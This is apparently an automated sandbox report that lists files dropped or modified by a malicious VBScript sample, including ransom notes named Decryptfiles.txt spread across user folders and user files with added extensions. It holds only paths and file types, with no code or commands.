IOC Report
NOTIFICATION_OF_DEPENDANTS.vbs

loading gif

Files

File Path
Type
Category
Malicious
NOTIFICATION_OF_DEPENDANTS.vbs
ASCII text
initial sample
malicious
C:\Users\Public\AccountPictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Documents\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Downloads\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\RecordedTV.library-ms
data
modified
malicious
C:\Users\Public\Music\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Pictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\Public\Videos\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\.curlrc.kavi
data
dropped
malicious
C:\Users\user\.ms-ad\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\3D Objects\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0u2ggh1i.ury.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1nz5fynk.tnq.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bccm03k.uyb.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asmdgiyo.yry.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4dtb4rh.0ki.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_momoqcak.tpg.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngtvg4fm.dsv.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogjwy3uo.omj.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkeuc0bz.5wy.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkrmfx1x.yyj.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtna4nhm.5gf.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf3rzrvy.gje.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urs51o2u.bw4.psm1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ydl4wlxj.bgl.ps1
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\fjeljies.cpl
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\.curlrc.evro
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav
data
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\CRLogs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Flash Player\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Headlights\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Linguistics\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\LogTransport2CC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\RTTransfer\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Sonar\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Adobe\Sonar\SonarCC\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\AddIns\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Credentials\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Excel\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.kmFp
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Network\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\3bb58c52-85cd-4424-83c3-47720a094118
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\c6cd337d-cbfc-4f3d-88c4-6fd10913a1a0
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Speech\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Spelling\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-GB\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead.AePN
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Vault\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\AccountPictures\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms
OpenPGP Secret Key
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent Items\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AUFZRAWBIW.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.png
MPEG-4 LOAS, 4 or more streams
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.xlsx
OpenPGP Public Key
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EIVQSAOTAQ.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.xlsx
DOS executable (COM, 0x8C-variant)
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.xlsx.PMnv (copy)
DOS executable (COM, 0x8C-variant)
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HVLFEFMHHB.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KGUUUSONWY.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.xlsx
OpenPGP Public Key Version 7
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.xlsx
DOS executable (COM)
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.xlsx.VEHa (copy)
DOS executable (COM)
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.pdf
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.xlsx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.docx
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZGGKNSUKOP.png
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.mp3
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.IinT
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink.waqy
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocs.hWBS
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.WLfl
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Extensions\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txt
OpenPGP Public Key
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txt
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.json
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal.Olas
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832118.b6281059-34c6-49d8-97c7-24de33b104ab.new-profile.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832120.4cb4db2a-ee68-4128-8ff4-f04bdc710c24.event.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838410.75265401-2d75-4127-a70f-7d6e61df69a0.health.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4
data
dropped
malicious
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\Decryptfiles.txt
ASCII text, with very long lines (3354), with CRLF line terminators
dropped
malicious
